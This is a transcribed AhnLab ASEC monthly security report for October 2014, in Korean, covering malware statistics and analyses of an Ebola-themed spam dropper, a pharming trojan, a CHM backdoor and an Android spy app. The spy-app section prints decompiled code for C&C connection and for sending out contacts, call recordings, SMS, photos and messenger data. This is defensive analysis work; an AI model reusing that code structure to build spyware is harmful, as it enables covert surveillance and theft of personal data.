Security Trend ASEC Report VOL.58 October, 2014

Size: px
Start display at page:

Download "Security Trend ASEC Report VOL.58 October, 2014"

Transcription

1 Security Trend ASEC Report VOL.58 October, 2014

2 ASEC Report VOL.58 October, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 10 월보안동향 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 Table of Contents 보안이슈 SECURITY ISSUE 01 에볼라바이러스안내문으로위장한스팸메일 02 PUP 파일을변조하여유포되는 파밍 악성코드 03 VPN 사용자겨냥한 CHM 악성코드주의 악성코드상세분석 Analysis-In-Depth 01 스마트폰에저장된개인정보를수집하는스파이앱 19 ASEC REPORT 58 Security Trend 2

3 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 58 Security Trend

4 보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면, 2014 년 10 월한달간탐지된악성코드수는 406 만 5,620 건으로나타났다. 이는전월 252 만 3,094 건보다 154 만 2,526 건증가한수치다. 한편 10 월에수집된악성코드샘플수는 457 만 2,315 건으로집계됐다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드샘플수를의미한다. 5,000,000 4,000,000 4,065,620 3,000,000 2,000,000 2,897,479 2,523,094 1,000, ,596,157 8 월 4,650,555 9 월 4,572, 월 탐지건수샘플수집수 [ 그림 1-1] 악성코드추이 ASEC REPORT 58 Security Trend 4

5 [ 그림 1-2] 는 2014 년 10 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로 그램인 PUP(Potentially Unwanted Program) 가 55% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 27.3%, 애드웨어 (Adware) 가 5.63% 로그뒤를이었다. 0.32% 4.53% 5.63% 55% 7.22% 27.3% PUP Trojan etc Adware Worm Downloader [ 그림 1-2] 주요악성코드유형 [ 표 1-1] 은 10 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. Adware/Win32.SwiftBrowse 가총 50 만 6,799 건으로가장많이탐지되었고, Trojan/Win32.Agent 가 17 만 1,157 건으로그뒤를이었다. [ 표 1-1] 악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 Adware/Win32.SwiftBrowse 506,799 2 Trojan/Win32.Agent 171,157 3 Adware/Win32.SearchSuite 161,174 4 PUP/Win32.SwiftBrowse 104,019 5 Trojan/Win32.OnlineGameHack 102,738 6 PUP/Win32.IntClient 90,832 7 Trojan/Win32.Starter 76,924 8 Adware/Win32.Agent 75,492 9 ASD.Prevention 64, PUP/Win32.MyWebSearch 57,111 ASEC REPORT 58 Security Trend 5

6 보안통계 02 웹통계 Statistics 2014 년 10 월악성코드유포지로악용된도메인은 1,365 개, URL 은 1 만 8,431 개로집계됐다. 또한 10 월 의악성도메인및 URL 차단건수는총 608 만 1,235 건이다. 악성도메인및 URL 차단건수는 PC 등시스 템이악성코드유포지로악용된웹사이트에접속하는것을차단한수이다. 7,000,000 6,081,235 6,000,000 5,343,498 5,000,000 4,000,000 3,545,673 3,000,000 2,000,000 40,000 30,000 30,918 20,000 15,842 18,431 10,000 1,902 1,338 1,365 악성도메인 /URL 차단건수 악성코드유포도메인수 0 8 월 9 월 10 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 ASEC REPORT 58 Security Trend 6

7 보안통계 03 모바일통계 Statistics 2014 년 10 월한달간탐지된모바일악성코드는 10 만 2,335 건으로나타났다. 250, , , ,000 74,413 75, ,335 50, 월 9 월 10 월 [ 그림 1-4] 모바일악성코드추이 ASEC REPORT 58 Security Trend 7

8 [ 표 1-2] 는 10 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. Android-Trojan/ FakeInst 가지난달보다 5,372 건증가한 2 만 683 건이었으며, Android-PUP/Noico, Android-PUP/ Chitu 와같은새로운유형의 PUP 가발견되었다. [ 표 1-2] 유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-Trojan/FakeInst 20,683 2 Android-PUP/SmsReg 13,095 3 Android-PUP/Dowgin 12,098 4 Android-Trojan/Opfake 9,438 5 Android-Trojan/SMSAgent 3,783 6 Android-PUP/Chitu 2,973 7 Android-Trojan/SmsSend 2,704 8 Android-Trojan/SmsSpy 2,197 9 Android-PUP/Wapsx 2, Android-PUP/Noico 2,078 ASEC REPORT 58 Security Trend 8

9 2 보안이슈 SECURITY ISSUE 01 에볼라바이러스안내문으로위장한스팸메일 02 PUP 파일을변조하여유포되는 파밍 악성코드 03 VPN 사용자겨냥한 CHM 악성코드주의 ASEC REPORT 58 Security Trend

10 보안이슈 01 에볼라바이러스안내문으로위장한스팸메일 Security Issue 에볼라바이러스에대한공포감이확산되고있는가운데사람들의불안한심리를악용한스팸메일과악성코드가발견되었다. [ 그림 2-1] 은이번에발견된에볼라관련스팸메일이며, 첨부파일에악성코드가포함되어있어주의가요구된다. 메일본문에는 WHO 로고와이름을사용하여 WHO( 세계보건기구 ) 에서발송한것처럼위장하였다. 사람들이오해하기쉽다. 게다가에볼라바이러스에대한불안감이확산되고있는상황에서 WHO가제공하는 에볼라바이러스로부터안전해지는방법 에관한내용이라면사람들의호기심을자극하기에충분하다. 그림 2-2 첨부된압축파일을해제하면생성되는파일 그림 2-1 WHO 로위장하여발송된스팸메일 해당메일의첨부파일은 rar 압축파일이다. 압축된이파일을해제하면 [ 그림 2-2] 와같이 exe 파일이생성된다. 실행파일의아이콘은흰색이어서윈도탐색기에서확인하면 [ 그림 2-2] 와같이파일명만보인다. 발신자의메일주소확인결과, WHO가보낸메일이아니다. 실제 WHO의홈페이지주소는 int이며메일발송자의이메일주소는 who@care. com이다. 도메인이달라서쉽게발견할수도있지만, 메일주소앞의아이디가 who로표기되어있어 그림 2-3 첨부된압축파일을해제하면생성되는실행파일의생성시간 ASEC REPORT 58 Security Trend 10

11 스팸메일은최근발생하고있는에볼라바이러스의이슈를이용하여유포되었다. 하지만실제실행파일은 [ 그림 2-3] 과같이 2013년 8월 22일에생성되었음을확인할수있다. 이처럼최근이슈를악용하여악성코드를유포하더라도예전에제작한악성코드를재활용하는경우도있다. 그림 2-5 난독화된 AutoIt 스크립트파일을실행하는부분 [ 표 2-1] 의 dhkta.bvi 파일을확인하면 [ 그림 2-5] 와같이 Excute(BinaryToString( ) 의문자열을통해난독화된스크립트를실행한다. AutoIt으로작성된난독화스크립트이다. 최초의악성파일이실행될때생성된 nxjqw.cmd 파일에의해실행된다. 그림 2-4 실행파일형태의 RAR SFX 압축파일 [ 그림 2-4] 와같이파일정보는실행파일형태의 RAR SFX 압축파일이다. 압축파일인점에서다수의파일이생성될수있음을예상할수있다. 또한압축파일이해제되면서동시에특정파일이실행될가능성도예측할수있다. 실제로해당파일은 [ 표 2-1] 과같이동작한다. 표 2-1 압축파일해제후특정파일실행 [ 생성되는파일 ] C: Documents and Settings Administrator Application Data eaedq 폴더에약 40여개의파일 [ 시작프로그램등록 ] HKLM SOFTWARE Microsoft Windows CurrentVersion Run WindowsUpdate "C Documents and Settings Administrator Application Data eaedq nxjqw.cmd C: DOCUME~1 ADMINI~1 APPLIC~1 eaedq dhkta.bvi" 그림 2-6 AutoIt 스크립트실행을돕는 nxjqw.cmd 파일 [ 그림 2-6] 과같이 nxjqw.cmd의정보는 AutoIt 스크립트의실행을돕는 AutoIt3.exe 파일이다. 해당 nxjqw.cmd 파일에의해 dhkta.bvi 스크립트가실행되면서다음과같은특정 IP 주소로통신을시도한다. [ 네트워크연결시도 ] 5.**4.1*2.*6:1**4 해당악성코드에감염되면사용자의 PC 정보를탈취 ASEC REPORT 58 Security Trend 11

12 하는등개인정보유출로인한피해가발생할수있어주의가필요하다. 특히최근이슈에대한제목의스팸메일의경우다음과같은사항을준수하여피해가발생하지않도록사전에예방해야한다. [ 안전한이메일사용법 ] 발신인이불분명한메일은열람금지 최신의백신엔진유지와실시간감시활성화 첨부파일은백신검사후실행및열람 본문의 URL은가급적접속하지말것 확장명숨기기기능해제하기 V3 제품에서는관련악성코드를다음과같이진단하 고있다. <V3 제품군의진단명 > Trojan/Win32.DarkKomet ( ) Trojan/Win32.MDA ( ) ASEC REPORT 58 Security Trend 12

13 보안이슈 02 PUP 파일을변조하여유포되는 파밍 악성코드 Security Issue 최근불필요한프로그램 (Potentially Unwanted program, PUP) 을통해공인인증서와개인정보등을탈취하는사례가발생하고있어주의가요구된다. 이번에발견된악성코드는불필요한프로그램설치파일을변조하여유포되었다. 변조된설치파일을실행하면 [ 그림 2-7] 과같이인터넷쇼핑몰의바로가기아이콘이생성된다. 그림 2-8 시작프로그램레지스트리에등록된악성파일 Hfkhm.exe 파일이 [ 표 2-3] 의명령어를수행하면사용자의공인인증서가복사된다. 표 2-3 악성코드에의해실행되는명령어 그림 2-7 바탕화면에생성된바로가기아이콘 이후악성코드는 [ 표 2-2] 와같이파일을추가로생성한다. 표 2-2 추가생성된파일 [ 파일생성정보 ] C: hal SSI.exe C: hal SUB_1.exe C: 3XVXP131VD1UP124[ 랜덤한폴더명 ] Hfkhm[ 랜덤한파일명 ].exe [ 표 2-2] 에서생성된 SSI.exe 와 Hfkhm.exe 파일은 [ 시작프로그램 ] 의레지스트리에등록되며시스템재시작시자동으로실행된다. [ 명령어 ] xcopy.exe CREATE C: Lfyojjfq xcopy.exe CREATE C: Lfyojjfq yessign xcopy.exe CREATE C: Lfyojjfq yessign 098f6bcd4621d373 cade4e832627b4f6.der 복사된공인인증서는 [ 그림 2-10] 과같이압축되어 C&C 서버로전송된다. 그림 2-9 압축파일에존재하는공인인증서 ASEC REPORT 58 Security Trend 13

14 [ 그림 2-12] 의팝업이미지를클릭하면위조된은행사이트로연결된다. 사용자가위조된은행사이트내부를클릭하면 [ 그림 2-13] 과같이팝업창이나타나며, 보안관련재인증을요구한다. 그림 2-10 C&C 서버로전송되는압축파일 이후 Hfkhm.exe 파일은 [ 그림 2-11] 과같이호스 트 (hosts) 파일을변조한다. 그림 2-13 보안관련재인증을요구하는창 [ 그림 2-15] 와같이개인정보탈취페이지를통해입 력된정보는 C&C 서버로전송된다. 그림 2-11 변조된호스트 (hosts) 파일 [ 그림 2-12] 와같이감염된시스템에서주요포털사 이트나은행사이트에접속하면변조된호스트파일에의해파밍사이트로연결된다. 그림 2-14 개인정보입력페이지 ( 좌 )/ 금융정보입력페이지 ( 우 ) 그림 2-12 금융감독원을사칭한파밍사이트 그림 2-15 C&C 서버로전송되는입력된정보 ASEC REPORT 58 Security Trend 14

15 [ 그림 2-15] 와같이사용자가입력한금융정보는암 호화되지않은상태로전송된다. 따라서네트워크상에노출되어있어 2차피해가발생할수있다. [ 그림 2-16] 과같이정상적인은행사이트는주소창이녹색 ( 신뢰할수있는사이트 ) 으로표시된다. 은행등금융기관은어떠한경우에도보안카드의모든정보를요구하지않는다는점을염두에둔다면피해를최소화할수있을것이다. 그림 2-16 정상적인은행사이트주소창 ( 상 ) 위조된은행사이트주소창 ( 하 ) V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Dropper/Win32.MulDrop ( ) PUP/Win32.ShortCut ( ) Trojan/Win32.Palevo ( ) ASEC REPORT 58 Security Trend 15

16 보안이슈 Security Issue 03 VPN 사용자겨냥한 CHM 악성코드주의 국가기관정보시스템의 VPN 사용자를대상으로악성코드가유포되었다. 해당악성코드는 [ 그림 2-17] 과헬프 (Help) 파일로위장하였으며, CHM 파일에는 [ 표 2-4] 와같이다음의파일들이포함되어있다. 표 2-4 CHM 에포함되어있는파일들 msupdate.exe 가실행된다. 그림 2-18 object 태그를이용하여악성파일 (msupdate.exe) 실행 /index.htm - 악성파일을로드 / 제목없음.jpg - 사용자를속이기위한그림파일 /msupdate.exe - 악성파일 악성코드에포함되어있는 제목없음.jpg 의내용은 [ 그림 2-17] 과같다. msupdate.exe는리소스영역에 [ 그림 2-19] 와같이 DLL을포함하고있으며, 실행시해당 DLL을 Application Management 라는이름의서비스로등록시킨다 ( 서비스메인이름 iamcoming ). 그림 2-19 리소스영역에포함되어있는 DLL( 상 ) 해당 DLL을서비스로등록 ( 하 ) 그림 2-17 CHM 실행화면 ( 제목없음. JPG) CHM 파일을실행하면 [ 그림 2-18] 과같은형식 의 index.htm 이실행되는데, 이때악성파일인 등록된 DLL은 C&C인 express.xxxxxx.com: 80(1x5.4x.2xx.1xx) 과통신하며, 사용자 PC 명과 IP 주소등의시스템정보를수집하여서버로보내고두개의스레드를생성하여명령을주고받는다. 이때패킷은암호화되어있으며보낼때에는 0x67, 받을때는 0x11 로, 각각 XOR로연산하여전송된다. ASEC REPORT 58 Security Trend 16

17 그림 2-20 난독화된패킷 ( 좌 )/ 복호화된패킷 ( 우 ) 해당악성코드는서버에서받아온명령 (ipconfig / all, cd, dir 등 ) 을통해 PC에있는디렉터리리스트나 IP 정보를계속유출한다. 서버에서받아온명령을그대로실행하면더많은악성행위가이루어질수있다. 따라서수신된메일의의심스러운 CHM 파일은열람을자제하는등사용자의각별한주의가필요하다. V3 제품에서는해당악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Dropper/Agent ( ) Trojan/Win32.Backdoor ( ) ASEC REPORT 58 Security Trend 17

18 3 악성코드상세분석 Analysis-In-Depth 01 스마트폰에저장된개인정보를수집하는스파이앱 ASEC REPORT 58 Security Trend

19 악성코드상세분석 01 스마트폰에저장된개인정보를수집하는스파이앱 Analysis-In-Depth 지금까지스미싱악성앱은소액결제나금융정보유출등사용자의금전적인피해를유발하는유형이주를이뤘다. 그러나최근스마트폰에저장된개인정보를유출해 2차적인피해를유발하는유형이증가하고있어주의가요구된다. 지난 10월, 메신저애플리케이션 DB를탈취하는악성앱이언론을통해알려졌다. 사용자정보를유출하는악성앱으로, V3 모바일 (V3 Mobile) 은해당악성앱을 Android-Trojan/MobileSpy로진단하고있다. Android-Trojan/MobileSpy는지난 9 월 15일안랩모바일악성코드자동분석시스템에서최초확인된이후꾸준히변형이나타나고있다. 설치및동작스미싱등을통해전파되는악성앱인 Android- Trojan/MobileSpy가설치시요구하는권한은 [ 그림 3-1] 과같다. 전화, 문자, 사진, 동영상, 위치, 연락처등에대한접근권한과오디오녹음권한, 저장소접근권한등을요구하며스마트폰시작시자동으로실행될수있다는점등일반적인앱이요구하는내용과는차이를보인다. Android-Trojan/MobileSpy는지속적으로 C&C 서버로의연결을시도하고이를통해공격자의명령을받아수행한다. 주요기능은 통화내용녹음 SMS 문자발송 SMS 및통화수 발신내역유출 메신저애플리케이션 DB의대화내용을복호화한후유출하는행위등이다. 전형적인스파이앱으로, 스마트폰에저장된모든정보를외부로유출할수있어 2차피해가우려된다. 그림 3-1 Android-Trojan/MobileSpy 설치시권한요구 해당앱이설치되면 ILoveYou 라는이름의앱이스마트폰화면에나타난다. 이때주로사용되는아이콘은 [ 그림 3-2] 와같이 2가지이며, 스마트폰의해상도에따라다르게보일수있다. ASEC REPORT 58 Security Trend 19

20 상세기능분석앞서악성앱이실행될때나타나는증상을살펴보았다. 지금부터해당악성앱의상세한기능을알아본다. 먼저안드로이드앱의명세를가진 AndroidManifest.xml 파일을살펴보자. 그림 3-2 Android-Trojan/MobileSpy 설치시아이콘그림 3-3 Android-Trojan/MobileSpy 설치화면 사용자가해당앱을실행하면화면만깜빡일뿐실행과관련된별도의화면이나타나지않는다. 그러나 Android-Trojan/MobileSpy가실행되면 CPU 정보, 화면크기, 네트워크상태등의기본정보를 C&C 서버로전송한다. 그림 3-4 Android-Trojan/MobileSpy 실행시전송되는정보 <?xml version='1.0' encoding='utf-8'?> <manifest xmlns:android= " android:versioncode="1" android:versionname=" " package="com. server"> <uses-sdk android:minsdkversion="3"/> 중략 <service android:name=".bootservice"> <intent-filter> <action android:name="com.server.bootservice"/> </intent-filter> </service> <service android:name=".phonelistenerservice"> <intent-filter> <action android:name="com.server.phone- ListenerService"/> </intent-filter> </service> 중략 <receiver android:name=".sdcardbroadcastreceiver"> <intent-filter> <action android:name="android.intent.action.media_ SCANNER_FINISHED"/> <data android:scheme="file"/> </intent-filter> </receiver> </application> <permission android:name="android.permission.baidu_ LOCATION_SERVICE"/> BAIDU_LOCATION_SERVICE"/> ACCESS_COARSE_LOCATION"/> ACCESS_NETWORK_STATE"/> INTERNET"/> ACCESS_WIFI_STATE"/> CHANGE_WIFI_STATE"/> ASEC REPORT 58 Security Trend 20

21 READ_SMS"/> SEND_SMS"/> WRITE_SMS"/> RECEIVE_BOOT_COMPLETED"/> PROCESS_OUTGOING_CALLS"/> READ_PHONE_STATE"/> READ_CONTACTS"/> MOUNT_UNMOUNT_FILESYSTEMS"/> WRITE_EXTERNAL_STORAGE"/> ACCESS_FINE_LOCATION"/> RECORD_AUDIO"/> CAMERA"/> VIBRATE"/> READ_LOGS"/> WRITE_SETTINGS"/> </manifest> AndroidManifest를통해해당앱의인터넷접속, 와이파이 (Wi-Fi) 접근및네트워크상태를확인하며단말기에저장된연락처정보, 송 수신한 SMS의내용, 수 발신전화를사용할수있는권한등이있음을확인할수있다. 진동, 카메라, 오디오녹음기능등도포함하고있다. 또한스마트폰의인텐트 (Intent) 를받아동작하는주요서비스와리시버로부팅인텐트를필터링해동 작하는 BootService 가있으며전화수신시동작하는 PhoneListenerService 가있음을알수있다. 이처럼 AndroidManifest에서나타난권한과리시버, 서비스정보로미루어볼때 Android-Trojan/ MobileSpy는스마트폰의리소스중카메라, 음성녹음을인위적으로사용할수있고통화문자와관련된기록및통화내용에대한접근도가능하다는것을추측할수있다. [ 그림 3-5] 는안랩모바일악성코드분석도구를통해해당앱을구성하는클래스들의관계를시각화한것으로, 특히해당앱의아이콘을클릭했을때동작하는클래스들을표현한것이다. 그림 3-5 최초실행시동작하는클래스관계 1. MainActivity [ 그림 3-5] 의클래스중런처에서해당앱의아이콘을클릭하여최초실행하면, MainActivity 클래스가실행된다. ASEC REPORT 58 Security Trend 21

22 MainActivity 2. BootService BootService 서버통신연결 기본정보 (CPU 정보, 화면크기, 네트워크상태 ) 서버로전송 BootService meibu.net / 1086 연결 / 1086 연결 PhoneListenerService 통화녹음 LocationClient 위치정보 그림 3-6 MainActivity 클래스구조 MainThread 서버연결후 CPU 정보, 화면정보, 메모리정보, 네트워크연결상태서버로전송 MainActivity는 BootService와 PhoneListenerService를실행한다. BootService는 C&C 서버와통신을확인하고 CPU 정보, 화면크기, 네트워크상태등스마트폰의정보를 C&C 서버로전달하는기능을가지며, PhoneListenerService는통화를녹음하는기능을갖고있다. 이와관련된코드는다음과같다. 그림 3-7 BootService 클래스구조 BootService는 Baidu LocationClient를실행하고지정된 C&C 서버로연결해사용자정보를외부로전달한다. Baidu LocationClient는 Baidu 에서제작및배포하는위치정보획득관련라이브러리로, liblocsdk3.so라는네이티브라이브러리다. package com.server; public class MainActivity extends Activity { void Start() { SystemInfo.m_pMainIntent = new Intent(); SystemInfo.m_pMainIntent.setAction("com.server. BootService"); this.startservice(systeminfo.m_pmainintent); SystemInfo.m_pPhoneListenIntent = new Intent(); SystemInfo.m_pPhoneListenIntent.setAction("com.server. PhoneListenerService"); this.startservice(systeminfo.m_pphonelistenintent); return; protected void oncreate(bundle p4) { super.oncreate(p4); this.setcontentview( ); this.findviewbyid( ); this.start(); this.finish(); return; public class BootService extends Service { void Start(Service p10) { SystemInfo.m_LocationClient = new LocationClient(this. getapplicationcontext()); if(new DataFile(p10, SystemInfo._strOnlineFile).isFileExit() == 0) { SystemInfo.m_strHost = new String(Base64. decode(systeminfo.m_strhost.getbytes(), 0)); SystemInfo.m_strHost = SystemInfo. GetFromAssets(p10, "OnLine.txt"); this.m_mainthread = new MainThread(); this.m_mainthread.setconnethost(systeminfo.m_ strhost, SystemInfo.m_nPort); this.m_mainthread.setactivity(p10); new Thread(this.m_mainThread).start(); Thread.sleep( ); SystemInfo.m_strHost2 = new String(Base64. decode(systeminfo.m_strhost2.getbytes(), 0)); ASEC REPORT 58 Security Trend 22

23 this.m_mainthread2 = new MainThread(); this.m_mainthread2.setconnethost(systeminfo.m_ strhost2, SystemInfo.m_nPort); this.m_mainthread2.setactivity(p10); new Thread(this.m_mainThread2).start(); return; public void oncreate() { super.oncreate(); this.m_service = this; this.start(this); return; BootService가실행되면먼저위치정보확인을위해 LocationClient 객체를생성한후내부에 isonlie.dat가있는지확인한다. isonlie.dat가없으면 OnLine.txt에서호스트 URL의주소를읽고읽어온주소로접속한다. 분석한앱이접속하는 URL 은 meibu.net이다. 10초후내부에 Base64 인코딩된주소인 으로접속한다. 3. MainThread MainThread는 sendonlinemessage를실행한후 MainManager를실행한다. public class MainThread implements Runnable { public void run() { while(true) { if(this.m_mainmanager.bconnected) { this.m_mainmanager = new MainManager(); this.m_mainmanager.setactivity(this.m_activity); this.m_mainmanager.setconnethost(this.m_strhost, this.m_nport); if(this.m_mainmanager.initsock()!= 0) { this.sendonlinemessage(); new Thread(this.m_mainManager).start(); Thread.sleep( ); sendonlinemessage는다음과같이시스템정보를수집해 C&C 서버로전송한다. public void sendonlinemessage() { v1 = new byte[501]; v5 = new SystemInfo(); v5.setactivity(this.m_activity); v1[0] = 50; v2 = v5.getcpuinfo().getbytes("unicode"); System.arraycopy(v2, 0, v1, 1, v2.length); v2 = v5.gettotalmemory().getbytes("unicode"); System.arraycopy(v2, 0, v1, 101, v2.length); v2 = v5.getheightandwidth().getbytes("unicode"); System.arraycopy(v2, 0, v1, 201, v2.length); v2 = new StringBuilder(String.valueOf(SystemInfo.ReadWriteStact(this. m_context))).append(systeminfo._strversion).tostring(). getbytes("unicode"); System.arraycopy(v2, 0, v1, 301, v2.length); v1[401] = v5.getnetworkstat(); this.m_mainmanager.m_clientsock.sendbuffer(v1, 501); return; 4. MainManager MainManager는 C&C 서버에서전달한명령을확인하고수행한다. [ 그림 3-8] 은안랩모바일악성코드분석도구를이용해 MainManager를시각화한것이다. ASEC REPORT 58 Security Trend 23

24 MainManager 는서버의명령에따라동작하며가 능한동작은다음과같다. PhoneBookManager 서버에서수신한값이 0 인경우, PhoneBookManager 객체가생성되고지정된서버로연락처정보를전송한다. 그림 3-8 MainManager 관련클래스관계 [ 그림 3-8] 의클래스명을다시단순화하면 [ 그림 3-9] 와같으며, 이는해당앱이실행하는명령들을의미한다. PhoneRecodeManager 서버에서수신한값이 1 인경우, PhoneRecode- Manager를생성하고서버와연결한다. 서버로 52 를전송하고 PhoneRecodeManager를시작한다. PhoneRecodeManager는통화기록을서버로전송한다. 그림 3-9 악성앱이수행하는주요명령 public class MainManager extends ClientManager { public void OnRecive(byte[] p26, int p27) { switch(p26[0]) { case 0: v16 = new PhoneBookManager(); v16.setconnethost(this.m_strhost, this.m_nport); if (v16.initsock() == 0) { else { v16.setactivity(this.m_activity); v16.sendstart(); new Thread(v16).start(); break; 통화녹음은 PhonelistenerService에의해수행된다. PhonelistenerService는통화상태를계속확인하고전화가수신되면 strphonenumber 에수신전화번호를기록하고통화가시작되면 sdcardpath/anserver/ 에 수신번호MMdd- hhmm.amr 이라는이름으로통화내용을녹음한다. 통화가종료되면녹음을멈춘다. case 1: v17 = new PhoneRecodeManager(); v17.setconnethost(this.m_strhost, this.m_nport); if (v17.initsock() == 0) { else { v17.setactivity(this.m_activity); v17.sendstart(); new Thread(v17).start(); break; ASEC REPORT 58 Security Trend 24

25 MessageManager 서버에서수신한값이 2 인경우, Message- Manager를생성하고서버와통신한다. 서버로 53 을전송하고 MessageManager를시작한다. 서버로부터수신한값에따라 SMS와관련된작업을수행한다. case 2: v11 = new MessageManager(); v11.setconnethost(this.m_strhost, this.m_nport); if (v11.initsock() == 0) { else { v11.setactivity(this.m_activity); v11.sendstart(); new Thread(v11).start(); break; FileManager 서버에서수신한값이 3 인경우, FileManager를생성하고서버와통신한다. 서버로 54 를전송하고 FileManager를시작한다. FileManager는단말기에저장된파일에대한작업을수행한다. case 3: v6 = new FileManager(); v6.setconnethost(this.m_strhost, this.m_nport); if (v6.initsock() == 0) { else { v6.setactivity(this.m_activity); v6.sendstart(); new Thread(v6).start(); break; MainThread 서버에서수신한값이 7 인경우, 함께수신한 URL 과 Port로 C&C 주소를변경한다. 변경된주소가설정되면 MainThread를다시시작한다. case 7: v9 = new byte[(p27-1)]; v10 = new MainThread(); new String(); System.arraycopy(p26, 1, v9, 0, (p27-1)); v21 = new String; v21(v9, "UTF-8"); v14 = v21.length(); if (v14 <= 0) { else { v13 = v21.indexof(":"); v10.setconnethost(v19, Integer.parseInt(v21. substring((v13 + 1), v14))); v10.setactivity(this.m_activity); new Thread(v10).start(); break; LocationManager 서버에서수신한값이 8 인경우, Location- Manager를생성하고서버와통신한다. 서버로 57 을전송하고 LocationManager를시작한다. LocationManager는단말기의위치정보를서버로전송한다. case 8: v8 = new LocationManager(); v8.setconnethost(this.m_strhost, this.m_nport); if (v8.initsock() == 0) { else { v8.setactivity(this.m_activity); v8.sendstart(); new Thread(v8).start(); break; ASEC REPORT 58 Security Trend 25

26 UnInstall 서버에서수신한값이 9 인경우, UnInstall을호출한다. Uninstall은 isonlie.dat 파일을생성하고 ok로초기화한다. case 9: this.uninstall(); break; case 14: v4 = new CameraManager(); v4.setconnethost(this.m_strhost, this.m_nport); if (v4.initsock() == 0) { else { v4.setactivity(this.m_activity); v4.sendstart(); new Thread(v4).start(); break; RecodeManager 서버에서수신한값이 10 인경우, Recode- Manager를생성하고서버와통신한다. 서버로 58 을전송하고 RecodeManager를시작한다. RecodeManager는음성녹음을수행하고데이터를서버로전송한다. case 10: v18 = new RecodeManager(); v18.setconnethost(this.m_strhost, this.m_nport); if (v18.initsock() == 0) { else { v18.setactivity(this.m_activity); v18.sendstart(); new Thread(v18).start(); break; CameraManager 서버에서수신한값이 14 인경우, Camera- Manager를생성하고서버와통신한다. 서버로 60 을전송하고 CameraManager를시작한다. CameraManager는 Autofocus를이용해사진을촬영한후 SDCard/AnServer/ CamMMddhhmm.jpg 형식으로저장하고이를서버로전송한다. Ko***Manager 서버에서수신한값이 30 인경우, Ko***- Manager를생성하고서버와통신한다. 서버로 80 을전송하고 Ko***Manager를시작한다. Ko***Manager는디바이스에저장된메신저애플리케이션 DB 내용을서버로전송한다. 단, 해당메신저의대화내용은다른앱에서접근할수없는디렉터리에저장되기때문에루팅된단말기에서만이기능이동작한다. case 30: v7 = new Ko***Manager(); v7.setconnethost(this.m_strhost, this.m_nport); if (v7.initsock() == 0) { else { v7.setactivity(this.m_activity); v7.sendstart(); new Thread(v7).start(); break; 지금까지상세분석을통해살펴본 Android- Trojan/MobileSpy의주요기능을요약하면 [ 그림 3-10] 과같다. ASEC REPORT 58 Security Trend 26

27 PhoneListenerService 통화음성녹음 PhoneBookManager 단말기, SIM 카드에있는연락처정보전송 PhoneRecodeManager MessageManager FileManager LocationManager 통화기록전송 SMS 기록전송 서버에서수신번호와내용을 SMS 수신함에저장 수신한번호와내용을 SMS 전송 특정파일서버전송 파일제거 GPS 위치정보전송 RecodeManager 일정시간음성녹음 녹음파일전송 CameraManager 사진촬영 Ko *** Manager 메신저앱 DB 내용복호화시도 서버전송 그림 3-11 Android-Trojan/MobileSpy 제거방법 그림 3-10 악성앱주요기능 다행인 (?) 점은 Android-Trojan/MobileSpy 는관리자권한을요구하지않기때문에 V3 모바일등모바일백신으로제거할수있으며, 또는 [ 그림 3-11] 과같이애플리케이션정보에서삭제버튼을이용하면쉽게제거된다. 스미싱등을통해전파되는악성앱은대부분사용자의방심이나부주의에서설치된다. 악성앱을통한개인정보유출이나금전적인피해를예방하기위해서는스마트폰애플리케이션설치시요구하는권한에대해주의깊게살펴보는습관이필요하며모바일백신을이용하는것도바람직하다. ASEC REPORT 58 Security Trend 27

28 ASEC REPORT vol.58 October, 2014 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T F 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다 AhnLab, Inc. All rights reserved.

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하 Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정

More information

Security Trend ASEC Report VOL.56 August, 2014

Security Trend ASEC Report VOL.56 August, 2014 Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

Security Trend ASEC REPORT VOL.68 August, 2015

